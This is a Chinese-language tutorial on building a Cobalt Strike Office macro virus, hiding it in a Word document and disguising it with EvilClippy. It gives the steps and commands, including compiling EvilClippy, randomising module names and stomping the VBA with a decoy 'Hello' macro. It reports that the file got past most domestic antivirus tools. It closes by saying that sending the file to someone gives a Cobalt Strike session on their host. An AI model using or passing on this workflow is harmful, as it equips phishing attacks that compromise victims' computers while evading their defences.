Cobalt-Strike Office宏利用與免殺
1.打開Cobalt-Strike生產Office宏病毒。
首先需要設置監聽器、因為釣魚的目標比較單純,在這裡就不採用域前置技術。
然後使用攻擊模塊,生產Office宏病毒。
設置好監聽器。
生成宏病毒
2.將宏病毒放入word
首先打開Word,在審閱中編輯宏:
創建新的宏:
將生成的宏病毒放入Microsoft Word目錄下的ThisDocument,注意如果宏位置寫錯了很容易報錯。
按下Ctrl+S,將文件保存為啟用宏的Word文檔,注意這裡的作者需要修改,否則默認會使用賬戶名
此時帶宏病毒的Word文件已經生成,但是會發現過不了殺軟,需要進行免殺。
此時需要一款比較知名的免殺軟件:EvilClippy
軟件需要編譯運行,由於本人使用的是Linux環境進行免殺,所以命令如下:
首先需要有mono環境:
sudo apt-key adv –keyserver keyserver.ubuntu.com –recv-keys 3FA7E0328081BFF6A14DA29AA6A19B38D3D831EF
echo “deb //download.mono-project.com/repo/debian wheezy main” | sudo tee /etc/apt/sources.list.d/mono-xamarin.list
sudo apt-get update
sudo apt-get install mono-completesudo
apt-get install monodevelop
然後使用mono,進行編譯:
mcs /reference:OpenMcdf.dll,System.IO.Compression.FileSystem.dll /out:EvilClippy.exe *.cs
檢查免殺軟件是否可以正常運行:
mono EvilClippy.exe -h
然後進行免殺操作:
首先需要創建一個vba文件,後續需要進行混淆,vba內容如下
Sub Hello()
Dim X
X=MsgBox(“Hello VBS”)
#先使用一個模塊來設置隨機模塊名,混淆了一些分析工具,會生成一個以_EvilClippy.docm結尾的文件。
mono EvilClippy.exe -r Doc1.docm
#其次使用之前設置的vba文件對生成文件進行偽裝混淆,命令如下
mono EvilClippy.exe -s 3.vba Doc1_EvilClippy.docm
生成文件,放入沙箱進行查殺,效果如下:
過了國內大部分殺軟。
因此將文件發給別人就可以觀察到Cobalt-Strike有上線 主機了。
